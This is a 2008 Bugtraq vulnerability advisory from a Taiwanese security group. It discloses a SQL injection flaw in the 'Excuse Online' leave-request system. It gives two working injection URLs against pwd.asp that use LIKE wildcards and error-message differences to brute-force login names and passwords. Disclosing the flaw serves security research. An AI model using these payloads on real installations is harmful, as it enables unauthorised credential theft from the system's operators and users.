[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080526092514.4080.qmail@securityfocus.com>
Date: 26 May 2008 09:25:14 -0000
From: unohope@...oot.org
To: bugtraq@...urityfocus.com
Subject: Excuse Online (pwd) SQL Injection Vulnerability
_____ _ _ _____ _____ _____ _____
/ ___| |_| | _ \| _ | _ |_ _|
| (___| _ | [_)_/| (_) | (_) | | |
\_____|_| |_|_| |_||_____|_____| |_|
C. H. R. O. O. T. SECURITY GROUP
- -- ----- --- -- -- ---- --- -- -
http://www.chroot.org
_ _ _ _____ ____ ____ __ _
Hacks In Taiwan | |_| | |_ _| __| | \| |
Conference 2008 | _ | | | | | (__| () | |
|_| |_|_| |_| \____|____|_|\__|
http://www.hitcon.org
Title :: Excuse Online (pwd) SQL Injection Vulnerability
Author :: unohope [at] chroot [dot] org
IRC :: irc.chroot.org #chroot
ScriptName :: 線上請假系統
Download :: http://netlab.kh.edu.tw/download/excuse.rar
Mirror :: http://www.badongo.com/file/9514356
_______________
[SQL Injection]
- {pwd.asp} -
http://localhost/excuse/MainProgram/pwd.asp?pwd=blah&pID='+or+登入碼+like+'%25 // for login account
http://localhost/excuse/MainProgram/pwd.asp?pwd=blah&pID='+or+密碼+like+'%25 // for login password
If matched then return "Input Error in Account",
else return "Can Not Find The Account",
try error till you got it!
______
[NOTE]
!! This is just for educational purposes, DO NOT use for illegal. !!
# 2008/5/24 - chrO.ot group #
Powered by blists - more mailing lists